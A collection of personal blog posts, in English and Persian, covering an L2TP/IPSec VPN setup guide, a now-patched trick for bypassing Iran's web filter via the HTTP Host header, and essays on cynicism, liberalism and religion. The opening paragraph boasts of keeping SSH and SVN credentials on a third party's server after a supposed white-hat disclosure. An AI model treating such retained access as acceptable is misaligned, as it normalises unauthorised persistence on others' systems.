The tutorial described in this post, was actually performed by me. Some of the steps required lots of thinking and caution, to prevent me from being tracked and to prevent my chances being ruined (like in language files scenario). I have to disappoint you right here and now, by telling you that I contacted the ~~Removed From Text~~ team and patched their software, so that it’s not insecure anymore (after all, I’m a white-hat). I also forked my access to many parts of the server, notably SSH user/passwords, SVN credentials and other critical information so that under no circumstances, any security expert other than me could patch the server against my access. Have fun learning Information Security!

سندهای آموزشی مهندسی اینترنت

AbiusX — Fri, 03 Feb 2012 17:47:26 +0000
ترم پیش که حل تمرین مهندسی اینترنت بودم یک سری سند آموزشی توسط بچه‌هایی که پروژه تحقیقاتی رو انتخاب کرده بودند مهیا و سر هم شد. بالاخره بعد از چندین ماه گلچین و آپلود کردم و همشون در آدرس زیر قرار دارند. لیست این مقالات گلچین شده رو هم در ادامه مطلب قرار می‌دم:
http://abiusx.com/ta/sbuie89b/project/research

بررسی برخی از پروتکل‌های معمول در اینترنت آرمین بلقدر، مسعود فیروزآبادی پروتکل‌های معمول اینترنت و لایه کاربرد فاطمه آرزومند اینترنت و پروتکل‌های رایج در آن ریحانه امیر‌ابادی فراهانی پروتكلها و تكنولوژيهاي مورد استفاده در وب (بخش اول) آرمین بلقدر، مسعود فیروزآبادی پروتکل‌های معمول اینترنت (و پروتکل‌های لایه کاربرد) المیرا نظام‌فر وب 2، دلایل پيدايش، ويژگيها و چشم‌انداز فاطمه الیاسی وب ۲ زهرا وحیدی فردوسی آژاکس آرمین بلقدر، مسعود فیروزآبادی آموزش آژاکس زهرا حسینی، الهه جلمبادانی آموزش CSS فرهنگ حسینی، مهدی جزایری آموزش CSS زهرا حسینی، الهه جلمبادانی پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب المیرا نظام‌فر پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب فاطمه آرزومند پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب فاطمه دشتی پروتکل‌ها و تکنولوژی‌های مورد استفاده در وب مهران گلی پروتکل‌های اینترنت مرضیه کریمی نوری وب ۲ ریحانه امیرآبادی فراهانی پروتکل‌های اینترنت رزیتا رحیمی آموزش جاواسکریپت زهرا حسینی، الهه جلمبادانی آموزش پی اچ پی زهرا حسینی، الهه جلمبادانی زبان‌های پردازه‌نویسی تحت سرور آرمین بلقدر، مسعود فیروزآبادی آشنایی با وب ۲ و رویکردهای آن آرمین بلقدر، مسعود فیروزآبادی بانک‌های اطلاعاتی سرور آرمین بلقدر، مسعود فیروزآبادی سرورهای وب زینب عباسی مزار

L2TP on Ubuntu 10.04 LTS

AbiusX — Tue, 10 Jan 2012 21:59:29 +0000

This post is a tutorial on how to run a L2TP over IPSec VPN Server for proxy purposes on a Ubuntu 10.04 LTS Server machine. Before we start the practice, let us review some theories:

What is VPN?

Virtual Private Network, is a technology, mainly developed to provide creation of virtual local networks with a wide geographic distribution. For example, we have a data-center and a considerable network in Bandar Abbas that requires constant maintenance and connectivity to our main servers and offices back in Tehran. We need a local network which consists of our office networks and the Bandar Abbas network, but since they are geographically distributed, we can’t have them local, so we cheat and virtually create a private (local) network, hence VPN.

Specifically speaking, we start a VPN server on our Bandar Abbas hub server (main.rajaei.abx.ir), then create a VPN connection from our computer (or router) and connect to it, and it would be like we have just plugged an Ethernet cable into our system, directly connected to whole Bandar Abbas network. After that we could simply connect to our surveillance server at 192.168.0.220 (which is a Bandar Abbas network IP, not ours) via any application.

As you might’ve already guessed, since VPN is usually established over the Internet, the most important thing to expect is data transmission security. No third party on the route should be able to sniff on our corporates data, right? VPN security is almost the main issue.

Then what is PPTP, L2TP, IPSec, SSTP, etc. ?

VPN, is a concept. It’s also a technology, but many protocols and mixtures of technologies tend to provide such means. The simplest form is PPTP, the point to point tunneling protocol. It is easily established, easily connected and fast. To setup a PPTP server on Ubuntu, you need less than 5 minutes. The problem with PPTP is data encryption. To encrypt data with PPTP, both parties (VPN Client and Server) have to agree on an encryption key, and any hacker listening while they are discussing it, would be able to read their transfers.

Then there comes OpenVPN, which is totally open source and good, but since there’s no native client on Windows, no body actually uses it. SSTP is also only Windows based, which is based on SSL Tunnels, very like the IPSec underlying layer of L2TP.

The other mostly used VPN technology, is L2TP, which relies on IPSec (lower network layer protocol) for its security. IPSec is a protocol which uses PKI (Public Key Infrastructure), or PSK (Pre-Shared Keys) which both are means to establish Zero-Knowledge connections securely without a third party being able to guess the password.

L2TP is technically called L2TP over IPSec, which is because first IPSec establishes a secure connection between two systems, then layer 2 tunneling protocol takes over for the networking and VPN functionality.

VPN as a means of proxy

In many cases, VPN is used for bypassing certain limitations and/or privacy, as proxy servers are used. Since VPN establishes a low level networking, proxies based on a VPN proxy all sorts of network connections, not just the web or videos. Anything, from peer to peer connections to DNS lookups are performed over the VPN.

To use a VPN for proxy purpose, we simply need to connect to a VPN far away (usually outside filtering region, if we are trying to bypass regional filtering) and use their internet connection. It is as if out Internet gateway, is not our own modem, but the computer over at the VPN.

VPN technologies (all PPTP, L2TP, SSTP, OpenVPN, etc.) work on certain ports and use certain traceable technologies. So blocking VPN usage is pretty simple, as PPTP no longer works more than a few seconds in Iran.

But with SSTP and L2TP, since both use a lower level encryption methodology (IPSec for L2TP), they can not be easily blocked. You might think that it would be pretty easy to prevent all IPSec connections and thus stop L2TP, as well as SSL for SSTP, but the case is, IPSec and SSL are used for all forms of encryption. When you use a banking service on the Internet, you employ SSL. When you transfer a file securely over the network, you employ IPSec. Blocking them would stop half of the Internet functionality.

There’s also no way of peeking into IPSec or SSL encrypted data (which contain the actual VPN packets), hence L2TP and SSTP services could not be stopped that easily.

Lets get dirty

Now I’m going to provide you with instructions on how to setup and use a L2TP VPN on your Ubuntu server for proxy purpose.

First of all, install a few packages:

sudo apt-get install ppp xl2tpd openswan

After having all the necessary daemons, assuming your server’s IP address is 178.162.154.252 (which is actually abiusx.com’s), put the following in /etc/ipsec.conf file

version 2.0
config setup nat_traversal=yes virtual_private=%v4:10.0.0.0/8,%v4:192.168.1.0/16,%v4:172.16.0.0/12 oe=off protostack=netkey include /etc/ipsec.d/l2tp-psk.conf

Then open up /etc/ipsec.d/l2tp-psk.conf and put the following in it, don’t forget to replace my IP with yours:

conn L2TP-PSK-NAT rightsubnet=vhost:%priv also=L2TP-PSK-noNAT

conn L2TP-PSK-noNAT authby=secret pfs=no auto=add keyingtries=3 rekey=no type=transport left=~~178.162.154.252~~ leftnexthop=~~178.162.154.1~~ leftprotoport=17/1701 right=%any rightprotoport=17/%any dpddelay=15 dpdtimeout=30 dpdaction=clear

You also need to open /etc/ipsec.secrets and put your pre-shared secret (e.g 123456789) in it:

~~178.162.154.252~~ %any: PSK “123456789″

Now restart IPSec, and watch your /var/log/auth.log and you’re done for IPSec on the server. On the client (preferably a Windows machine), create a VPN connection, on its properties dialog, in security tab, there’s “IPSec Settings” which asks you for the pre-shared secret. Provide 123456789. On the networking tab, from Type of VPN, select L2TP IPSec VPN. Now connect and inspect your server:

sudo service ipsec restart sudo tail -f /var/log/auth.log

You should see something like “IPsec SA established” in middle of some logs, that means IPSec was successfully established. Of course the VPN connection will fail since we haven’t setup L2TP part yet.

L2TP Setup

Now we need to configure xl2tpd, there are three files we need to change, two are xl2tpd config files, and one is username/password file. Let’s start with /etc/xl2tpd/xl2tpd.conf which should have the following:

[global] ipsec saref = yes [lns default] ip range = 192.168.1.231-192.168.1.239 local ip = 192.168.1.230 refuse chap = yes refuse pap = yes require authentication = yes ppp debug = yes pppoptfile = /etc/ppp/options.xl2tpd length bit = yes

Then off to /etc/ppp/options.xl2tpd which would have:

require-mschap-v2 ms-dns 192.168.1.1 asyncmap 0 auth crtscts lock hide-password modem debug name l2tpd proxyarp lcp-echo-interval 30 lcp-echo-failure 4

And finally /etc/ppp/chap-secrets which contains username/password pairs:

username l2tpd 1234 192.168.1.231 l2tpd username 1234 192.168.1.231 user2 l2tpd 123 *

Since the * format crashes on some versions of xl2tpd, preferably use the static user/ip method. To wrap things up, /etc/sysctl.conf should contain “net.ipv4.ip_forward = 1″ which enables IP Forwarding. If you just added it, do a networking restart or system reboot.

Oh and you might need to do some routing to route VPN IPs to your gateway.

Have fun using L2TP over IPSec.

The Cynic and the Condemned

AbiusX — Sun, 01 Jan 2012 18:51:59 +0000

Well, I know for a fact that I’m a cynic. But I wanted to have a definition for it, so I took a peek at the Internet. The sweet Wikipedia had some definition, totally irrelevant of the popular culture, based on some old Greek Philosophy practicing Areté.

Finally I found some interesting matching definitions on wiki.answers.com :

What is the difference between a cynic and an idealist?

A cynic is someone who fails to thrive, who picks apart good ideas and has a tendency to make life boring and miserable for himself and others. They do not see the purpose of success. They do not get excited. They do not understand where the passion of others comes from. Idealists are dreamers of success and have a potential to succeed. They have grand dreams of things they are interested in and work hard to see them come to light. If they fail, they can quite easily become cynics themselves. Many might argue that a cynic is simply an idealist who has experienced failure. In other words, you must first be an idealist before you have the capacity to be cynical.

And also, a few interesting quotes on the subject, which I really enjoyed :

“The cynic is one who never sees a good quality in a man, and never fails to see a bad one. He is the human owl, vigilant in darkness and blind to light, mousing for vermin, and never seeing noble game. The cynic puts all human actions into two classes – openly bad and secretly bad.” Henry Ward Beecher

“A cynic is a man who, when he smells flowers, looks around for a coffin.” H. L. Mencken

“A cynic is not merely one who reads bitter lessons from the past, he is one who is prematurely disappointed in the future.” Sidney J. Harris

And for the end an example of a cynical statement:

“In the depths of my heart I can’t help being convinced that my dear fellow-men, with a few exceptions, are worthless.” Sigmund Freud

Why liberalism only suits US

AbiusX — Wed, 28 Dec 2011 00:55:53 +0000

This is People’s Republic of China, an old man is headed into a banking establishment to do some everyday bank tasks. The bank is quite crowded, but after a few minutes it’s finally his turn to take up the booth. He seems pretty slow with papers and also isn’t the sharpest when answering the bank employee’s questions, and this has been going on for a while.

The young lady who has entered the bank a few seconds after the old man, is growing impatient with the old man’s progress. She’s next, but it doesn’t seem like her turn will be coming up soon. Also, there aren’t any empty booths as there aren’t many functional booths available in the bank, and even if they were, they might’ve been occupied as well.

She couldn’t switch banks, since other banks are also pretty crowded and the switching process would probably consume more time than she’s gonna end up waiting for her turn in a lifetime of bank chores. After all, there are rarely enough banks for all of people in China, as in almost any other country.

While taking her time to wait, the bright women is fantasizing something in her head :

This is the United States, an old man goes into a bank to pay some bills. Since the bank is almost empty, as soon as he enters the bank, the booth accepts him. The man has around 30 bills and is quite slow doing paperwork, so he’s gonna take at least 45 minutes.

Another customer, a young woman also enters the bank. She seems impatient, and seeing the old man taking his time is boring her. Fortunately, there are plenty of other empty booths waiting for other customers, and even if there weren’t, she could easily switch banks and choose another eager one with plenty of room for new customers. After all, there are many more banks than people actually need in the US.

Liberalism is pretty delicious, ain’t it?

Thinking of all that, our lady realizes the old man has made only a little progress. She’s wondering what is the right thing to do in a situation like this, to put the old man at the back of the waiting line, since his task requires considerable time, or let him do whatever he requires in his own turn.

The second idea, however liberal it might sound, is starting to seem dull and inefficient to the lady, and amazingly the first one is the course of action she chooses as best fitting.

After all, Liberalism ain’t that suiting for everybody, is it?

نحوه فیلترینگ در ایران و نقاط ضعف آن

AbiusX — Sun, 31 Jul 2011 02:22:58 +0000

نکته: ضعف معرفی شده در این مطلب از دی‌ماه ۱۳۹۰ توسط تیم فیلترینگ رفع گردیده است و این مطلب صرفا کاربرد آموزشی-فنی دارد.
امشب برای راه‌اندازی چندنوع پراکسی با تکنولوژی‌های مختلف، مجبور شدم نحوه کارکرد سیستم فیلترینگ ایران رو بررسی کنم و به نتایج خیلی جالبی رسیدم که خوبه شما هم بدونید : اولا که فیلترینگ تنها بر روی وب (یعنی پروتکل‌های HTTP , HTTPs) پیاده شده و هیچ پروتکل دیگری فیلتر نیست، در حالی که فیلترینگی که آمریکا به دلیل محرومیت بر ایران اعمال کرده تمام پروتکل‌ها رو شامل می‌شه. اما قبل از اینکه ادامه فرآیند فیلترینگ رو بدونیم، لازمه بدونیم که چگونه یک سایت بر روی کامپیوتر ما لود می‌شه. فرآیند بارگزاری یک سایت به عنوان مثال فرض کنید آدرس www.facebook.com/profile/abiusx رو در کاوشگر وب خودتون وارد کردید (Internet Explorer یا Mozilla Firefox). کاوشگر شما این آدرس رو به آدرس کاملی که شما حوصله تایپش رو نداشتید تبدیل می‌کنه:
http://www.facebook.com/profile/abiusx

این آدرس نوع پروتکل رو نیز در بر داره (که پیش فرض وب هست) و به کاوشگر اجازه می‌ده نحوه باز کردن اون رو تشخیص بده. قبل از هر کاری، کاوشگر وب باید بدونه www.facebook.com بر روی کدوم کامپیوتر سرور روی اینترنت قرار داره، یعنی شماره اون کامپیوتر رو بدونه. این فرآیند توسط پروتکل زیرساختی DNS انجام می‌گیره که آدرس‌ها رو به شماره تبدیل می‌کنه.

نکته مهمی که بعدا به اون بر خواهیم خورد اینه که DNS ماهیت پرسش و پاسخی داره، یعنی کامپیوتر شما از کامپیوتر دیگری در شبکه (که معمولا ISP یا همون سرویس دهنده اینترنتتون هست) سوال می‌کنه که این آدرس شماره اش چنده؟ و پاسخ می‌گیره. بسیاری از فیلترینگ‌ها در دنیا در همین مرحله پیاده می‌شن، یعنی کامپیوتر بالادست به شما پاسخ می‌ده که این آدرسش 10.10.34.34 هست (آدرس کامپیوتری که صفحه فیلترینگ روش قرار داره)، اما اینگونه فیلترینگ به سادگی قابل رفع هست. کافیه شما یک کامپیوتر خارج از ایران رو به عنوان DNS خودتون مشخص کنید، مثلا 4.2.2.4 رو در تنظیمات اتصال به شبکه به عنوان آدرس کامپیوتر DNS خودتون وارد کنید و نگذارید که اتوماتیک مشخص شه. از این پس سوالات DNS شما از این کامپیوتر پرسیده می‌شه و قاعدتا پاسخ‌های اون هم واقعی هستند و صفحه فیلترینگ نیستند.

همچنین باید توجه کرد که هر کامپیوتری در شبکه (اینترنت) که معمولا یک شماره داره، ممکنه یک یا چند سایت رو روی خودش سرویس دهی کنه. معمولا سایت‌های کوچک و کم مشتری بر روی کامپیوترهایی با چند سایت دیگر مشترک هستند، سایت‌های معمولی و پربازدید بر روی یک سرور اختصاصی با یک شماره هستند و سایت‌های معروف بر روی چندین سرور مختلف به صورت همزمان سرویس‌دهی می‌شوند.

برای درک این نسخه، برنامه ترمینال (Command Prompt) خود را باز کنید و دستورات زیر را وارد نمایید :

nslookup www.google.com

دستور فوق چندین شماره برمی‌گرداند، زیرا سایت گوگل بر روی چندین سرور مختلف سرویس دهی می‌شود

nslookup www.etebaran.ir

دستور فوق تنها یک شماره برمی‌گرداند زیرا این سایت بر روی یک سرور قرار دارد.

nslookup www.abiusx.com

nslookup www.etebaran.com

هر دوی دستورات زیر یک آدرس برمی‌گردانند، زیرا هردو سایت بالا بر روی یک کامپیوتر سرو می‌شوند.

پس از اینکه کاوشگر شماره کامپیوتر مقصد رو به دست آورد، یک اتصال شبکه از نوع TCP بر روی پورت ۸۰ (پورت مخصوص وب) برقرار می‌کنه و یک درخواست از نوع HTTP ارسال می‌کنه که جناب کامپیوتر مقصد، من فلان صفحه شمارو می‌خوام. قالب این درخواست متنی به صورت زیره :

GET http://www.facebook.com/profile/abiusx HTTP/1.1 Host: www.facebook.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) Gecko/20100101 Firefox/5.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Cookie: PHPSESSID=9PmTx2exnapZfHmnegR9MsiPb2C00aDc6 If-Modified-Since: Sat, 30 Jul 2011 15:21:45 GMT Cache-Control: max-age=0
این درخواست HTTP دارای اطلاعات خاصی است. برخی از خط‌های آن اختیاریست و برخی خط‌ها هم در بعضی درخواست‌ها وجود دارد که اینجا نیست. خط اول نوع درخواست (GET)، آدرس آن و نسخه پروتکل (1.1)‌ را معین می‌سازد. این خط مهمترین خط است و برای سرور مقصد همین یک خط به عنوان درخواست کفایت می‌کند تا بداند چه چیزی را باید به ما تحویل دهد. در خط دوم، سایت مورد نظر ذکر می‌شود. این خط توسط سرور وب استفاده می‌شود تا اگر چند سایت بر روی سرور قرار دارد، تشخیص دهد که کدامیک از آنها را باید نمایش دهد. لذا اگر تنها یک سایت بر روی سرور باشد، این خط کارایی ندارد. این خط جزو استاندارد HTTP است و باید همواره ذکر شود. خط‌های بعدی نوع کاوشگر مبدا و سیستم عامل و زبان‌های قابل فهم و زمان و غیره را مشخص می‌کند تا سرور مقصد بر اساس آنها صفحه مناسب را ارائه دهد. این خط‌ها تنها برای کاوشگران حرفه‌ای وب مهم هستند. سرور مقصد پس از دریافت این اطلاعات و پردازش آن، صفحه مورد نظر را پیدا کرده در قالب پاسخ HTTP با فرمت زیر ارسال می‌کند:
HTTP/1.1 200 OK Date: Mon, 23 May 2005 22:38:34 GMT Server: Apache/1.3.3.7 (Unix) (Red-Hat/Linux) Last-Modified: Wed, 08 Jan 2003 23:11:55 GMT Etag: "3f80f-1b6-3e1cb03b" Accept-Ranges: bytes Content-Length: 438 Connection: close Content-Type: text/html; charset=UTF-8
این پاسخ نمایانگر مشخصات سرور و وضعیت پاسخ است که توسط کاوشگر ما پردازش می‌شود. در ادامه این سرآیند، معمولا حجم انبوهی داده به قالب HTML (زبان ارائه وب) پیوست شده است که متن است، ولی توسط چشم انسان به سادگی قابل فهم نیست ولی توسط برنامه کاوشگر وب قابل درک است. کاوشگر وب این داده را پردازش می‌کند و در قالب صفحات وب بر روی صفحه رسم می‌کند تا کاربر آنها را مرور کند. نکته‌ای قابل توجه آنست که در میانه پردازش این داده، کاوشگر گاهی مجددا به آدرسی دیگر (مثل آدرس یک تصویر یا یک تکه صوت یا اسکریپت) بر می‌خورد و مجددا به همان سرور درخواستی ارسال می‌کند تا آن تکه داده را نیز دریافت کند و در رسم صفحه به کار بگیرد. چگونگی فیلترینگ یک فیلترینگ خوب، باید در مراحل مختلف بر روی درخواست و پاسخ اعمال شود. ابتدا اینکه در مرحله DNS باید پاسخ مقتضی برگرداند، که البته به راحتی قابل رفع است. سپس در مرحله درخواست باید خط اول و دوم را بررسی کند و آدرس سایت مقصد را استخراج کند و بر اساس آن تشخیص دهد که فیلتر شده است یا خیر. اگر فیلتری شده بود، پاسخ HTTP از نوع انتقال صفحه ( 301 Redirect)‌ به آدرس صفحه فیلترینگ را به جای آدرس اصلی برگرداند. در مرحله سوم باید بر اساس محتوای داده بازگشتی از سایت مقصد، تصمیم بگیرد که آنرا نگه دارد یا با انتقال تغییر دهد. اینکار از نظر پردازش بسیار هزینه‌بر است زیرا باید یک برنامه پیچیده تمام داده را مطالعه و پردازش کند و الگو‌های مورد نظر را تطبیق دهد، ولی معمول‌ترین روشیست که استفاده می‌شود. در ایران فیلترینگ تنها در فاز دوم (تشخیص آدرس از سرآیند) آنهم به صورت ناقص صورت می‌گیرد، یعنی تنها سرآیند Host بررسی می‌شود و آدرس آن با لیست فیلترینگ تطبیق یک به یک داده می‌شود، به همین دلیل بود که مثلا تا مدت بسیاری آدرس ww.facebook.com برای دسترسی به فیس بوک قابل استفاده بود. راه ساده عبور از فیلترینگ از آنجایی که تنها سرآیند Host در درخواست ما بررسی می‌شود و آدرس می‌تواند در خط اول درخواست جای گیرد و Host به کلی حذف شود (یا با آدرس سایتی بی مورد جایگزین شود)، راه بسیار ساده‌ای برای رفع فیلترینگ سایت‌هایی که سرور اختصاصی دارند وجود دارد. البته سایت‌هایی که با دیگر سایت‌ها در یک سرور مشترک هستند نیاز به Host دارند تا سرورشان تشخیص دهد کدام سایت درخواست شده است و مثلا همین سایت بنده را با اعمال این راه‌حل نمی‌توانید مرور کنید. قبل از توضیح روش اعمال، فرآیند زیر را انجام دهید تا بیشتر با جزئیات کار آشنا شوید:

ترمینال (Command Prompt) خود را اجرا نمایید و دستور زیر را وارد کنید

telnet facebook.com 80

دستور فوق یک اتصال به سرور موجود در facebook.com بر روی پورت 80 ایجاد می‌کند (همان کاری که کاوشگر می‌کند). پس از برقرار اتصال پیامی مبنی بر آماده بودن ارسال اطلاعات به شما می‌دهد. حال باید درخواست HTTP را وارد کرد.

GET /profile/abiusx HTTP/1.1

Host: www.facebook.com

پس از وارد کردن این دو خط، دوبار کلید Enter را فشار دهید. پس از چند لحظه پاسخ بر روی صفحه ظاهر خواهد شد :

HTTP/1.1 403 Forbidden LCT4-3
کد نتیجه 403 یعنی عدم اجازه دسترسی، به همراه بدنه‌ای که کاوشگر شمارا به سایتی در آدرس http://10.10.34.34 هدایت می‌کند به عنوان پاسخ ارسال شده است (در زبان HTML) با کمی مرور متن پاسخ این اطلاعات مشخص است. اکنون فرآیند زیر را انجام دهید تا پاسخ فیلتر نشود :

ترمینال خود را باز نمایید و دستور زیر را وارد کنید :

telnet facebook.com 80

پس از برقرار اتصال تک خط درخواست زیر را وارد کرده، دوبار کلید Enter را بزنید:

GET http://www.facebook.com/profile/abiusx HTTP/1.1

پاسخی به صورت زیر خواهد داد، که یعنی صفحه‌ای که شما می‌خواهید در آدرس دیگری قرار دارد (از آنجایی که نوع کاوشگر را مشخص نکرده‌اید، فیس بوک فکر می‌کند نوع خاصی از تلفن همراه هستید که صفحه آن آدرس خاصی دارد). آن آدرس را مجددا درخواست کنید و دوبار Enter بزنید:

GET http://www.facebook.com/common/browser.php HTTP/1.1

حجم نسبتا زیادی اطلاعات در قالب HTML خروجی داده می‌شود که همان صفحه فیس بوک است.

HTTP/1.1 302 Found Location: http://www.facebook.com/common/browser.php Content-Type: text/html; charset=utf-8 X-FB-Server: 10.27.60.111 Date: Sun, 31 Jul 2011 03:05:00 GMT Content-Length: 0
انجام این فرآیند به صورت دستی بسیار دشوار است، و همچنین خروجی HTML برای انسان قابل فهم نیست. اما این مکانیزم را به سادگی می‌توانید در مرورگرهای قدرتمند پیاده کنید. به عنوان مثال در مرورگر Firefox افزونه Modify Headers را نصب کنید. پس از اتمام نصب و راه‌اندازی مجدد مرورگر، از منوی Tools صفحه تنظیمات آنرا باز کنید. در فیلد های موجود Action را معادل Filter و Header name را معادل Host قرار داده، کلید Add را فشار دهید. اکنون فیلتر اضافه شده در لیست را انتخاب کرده، کلید Enable را فشار دهید تا چراغ کنار آن سبز شود. حال به آدرس www.abiusx.com مراجعه کنید. با پیام خطای سرور مواجه خواهید شد، زیرا نتوانسته تشخیص دهد کدام سایت روی آنرا خواسته‌اید. اما اگر به سایت www.facebook.com مراجعه نمایید مشاهده می‌کنید که مشکلی وجود ندارد و سایت بدون مشکل باز می‌شود. (البته توجه داشته باشید که برخی از تصاویر، به دلیل قرار داشتن بر روی سرورهای چندسایتی، بار نخواهند شد). پس از اینکه از سایت‌های مورد نظر (که قبلا فیلتر بودند)‌ دیدن کردید، می‌توانید مجددا از پنجره تنظیمات Modify Headers، فیلتر را انتخاب کرده آنرا غیر فعال کنید.

WB-Tree

AbiusX — Wed, 22 Jun 2011 18:32:51 +0000
آقای Jaffer یک پیاده‌سازی تر و تمیز و خوب و کاملا متن باز و قابل استفاده از B+ Tree انجام داده که خیلی راحت قابل استفاده هست و امکانات خوبی هم داره. ایشون از MIT هستند و زبان SCM که یک پیاده‌سازی آزاد و استاندارد از Scheme هست رو به همراه SLib پیاده‌سازی کرده. این کتابخونه که WB-Tree نام داره، در سی پلاس پلاس قابل استفاده نبود که بعد از کمی تعاملات و همکاری بین من و ایشون، قابل استفاده شد و یک راهنما و یک برنامه نمونه برای اون نوشتم. آدرس راهنما به شرح زیر هست :
http://abiusx.com/code/wb/

این پروژه و راهنما جهت پروژه ذخیره و بازیابی دانشجویان مهندسی کامپیوتر شهید بهشتی مهیا شده ولی در انواع پروژه‌های دیگر با ضریب اطمینان بالایی قابل استفاده هست. این راهنما در حال حاضر به عنوان راهکار اصلی استفاده از کتابخانه درC++ هم در سایت اصلی مطرح شده. امیدوارم مفید باشه.

تقابل فضل و عدالت الهی

AbiusX — Thu, 02 Jun 2011 07:30:27 +0000
از مسائلی که ممکن است ذهن آدم را درباره عدل الهی مشغول کند، بحث فضل خداست. دقت داشته باشید که عدالت از ویژگیهای ذاتا مطلوبه و لذا چون خدا عادله ما نمی‌گیم عدالت خوبه، بلکه ذاتا عدالت خوبه. البته تعیین مصادیق عدالت خیلی کار راحتی نیست ولی در یک کلیاتی ممکن است. فضل خداوند، ناشی از رحمت خداوند، یعنی اینکه خداوند به هرکسی که بخواهد خارج از حساب می‌دهد. شاید بارزترین مصداق فضل خداوند، معصومین و اولیا باشند، که خداوند به آنها از جایی که حساب نکنند بخشیده. ممکن است سوال پیش بیاید که معصوم بودن معصومین و عدم امکان معصوم بودن (یا امام و پیامبر) بودن امثال ما، چگونه با عدل الهی سازگار است؟ و سوالاتی از این قبیل که همگی مرتبط به فضل خداوند هستند، یعنی جایی که خداوند بی حساب به کسی می‌بخشد. اصلا مگر بی حساب بخشیدن عادلانه است؟ مشکل ازینجاست که در مصداق سنجی عدالت، همواره به موارد دنیایی و مادی اندیشیده‌ایم و با مدل دنیا سنجیده‌ایم. در این دنیا، اگر حاکم از بیت المال به کسی چیزی بیشتر دهد (از فضل خود)، عادلانه نیست، زیرا باعث شده به بقیه سهم کمتری برسد. حتی اگر معلمی به شاگردی نمره بیشتر دهد، هرچند ظاهرا حق دیگران را کمتر نکرده، ولی عملا از آنجایی که نمره و معدل در امکانات تعلق گرفته بعدی موثر است، عادلانه نیست زیرا دیگران را با اینکار پایینتر آورده و از حقوق آتی آنها کاسته است. لذا دنیا محدود است و هرگونه فضل دنیایی، محکوم به بی عدالتی. اما خداوند اینگونه نیست و از بیکران فضل خود را عطی می‌کند. اگر خداوند به کسی خیر دنیا و آخرت را ببخشد، حتی بدون حساب،‌نه از دیگران چیزی کم می‌شود و نه ضرری متصور آنان می‌گردد. از این رو خداوند حکیم این را ذکر می‌کند که به هرکسی هرآنچه بخواهیم می‌بخشیم و بزرگان نیز این را با عدالت خدا همسو می‌دانند، هرچند نفس انسان در ابتدا از پذیرش آن سر باز زند.

خوشحالی و ناراحتی

AbiusX — Wed, 11 May 2011 11:10:06 +0000
مطلبی که می‌نویسم، پیش‌نویسش برای ۱۶ آذر ۸۹ است. اما به نظرم الان در بین پیش‌نویس‌هایی که دارم مهمترین مورد است، امیدوارم که با خواندن آن گوشه تاریکی از ذهن و دلمان روشن شود. از مسائلی که در زندگی خیلی با آنها درگیر هستیم، خوشحالی و ناراحتی یا به عبارت کلی‌تر مود (Mood) ماست. هیچکس نمی‌تواند ادعا کند که زندگی انسان از خوشحالی و ناراحتی تشکیل نشده‌است و فردی دائم خوشحال یا دائم ناراحت بوده است. قصد من مدل کردن ناراحتی و خوشحال در این نوشته نیست، بلکه قصد دارم به تاثیرات این دو «حس» بر روی زندگی انسان بپردازم. اگر پس از انجام کاری احساس خوشحالی کنیم و از آنجام آن مسرور شویم، این عمل در ذهن ما تاثیر می‌گذارد و آنرا با خاطره خوشی یاداوری می‌کنیم. برعکس اگر از انجام کاری (چه توسط ما و چه دیگران) ناراحت شویم، سعی می‌کنیم زیاد به آن فکر نکنیم و در ناخودآگاه ذهن خود آنرا نامناسب می‌پنداریم. این تفکرات ناخودآگاه، در دراز مدت باعث می‌شود به این نتیجه برسیم که هر کاری که ما را خوشحال می‌کند، کاری خوب و «درست» است و هر کاری که از انجام آن ناراحت می‌شویم کاری بد و «غلط» است، تا جایی که خوشحالی و ناراحتی محور اصلی تصمیم‌گیری‌ها و تعیین مسیر زندگی ما می‌گردد، همانطوری که فرهنگ گمراه لیبرالیزم اعتقاد دارد باید طوری زندگی کرد تا خوشحال بود و در هر زمان تنها پاسخ پرسش «Are you happy doing this» می‌تواند در تصمیم‌گیری به ما کمک کند. اما آیا واقعا اینچنین است؟ قطعا اینچنین نیست و این از نفس و فطرت حیوانی ماست که نشات می‌گیرد، چنانچه حیوانات بر اساس همین احساس عمل می‌کنند و کاری به منفعت و مصلحت و غیره ندارند. برای اینکه ملموس‌تر درک کنیم اینچنین نیست، چند مثال می‌زنم :

امر به معروف و نهی از منکر که کاری واجب و مهم است، معمولا باعث ناراحت شدن مخاطب می‌شود (و به دلیل همین ناراحتی در او تاثیر می‌گذارد)

استفاده از مواد مخدر و مشروبات الکلی، به سادگی می‌تواند خوشحالی و شادی انسان را چندین برابر کند، اما آیا مصرف آنها کاری درست است؟ (و به همین دلیل است که در فرهنگ‌های لیبرال مصرف این موارد بسیار بسیار بالاست)

انسان‌های موفق و تاثیرگذار هموارد سختکوش و سختی کشیده بوده‌اند. زندگی اینگونه انسان‌ها معمولا هموار نبوده و قسمت عمده آنرا ناراحتی‌های بزرگ تشکیل داده است. برعکس انسان‌های سبک مغز و بی تاثیر معمولا زندگی راحت و خوشی داشته‌اند.

بنابراین باید توجه داشت که تصمیم‌گیری و قضاوت در مورد درستی و غلطی کارها نباید توسط احساس انسان، آنهم احساس ناخودآگاه خوشحالی و ناراحتی صورت بگیرد و انسانی موفق‌تر خواهد بود که بتواند تاثیر این احساسات را در اتخاذ تصمیمات خود به حداقل برساند. حال واقعا ما چقدر بر اساس این دو احساس تصمیم می‌گیریم و عمل می‌کنیم؟

وظایف زن و مرد در زندگی زناشویی

AbiusX — Fri, 06 May 2011 14:26:59 +0000
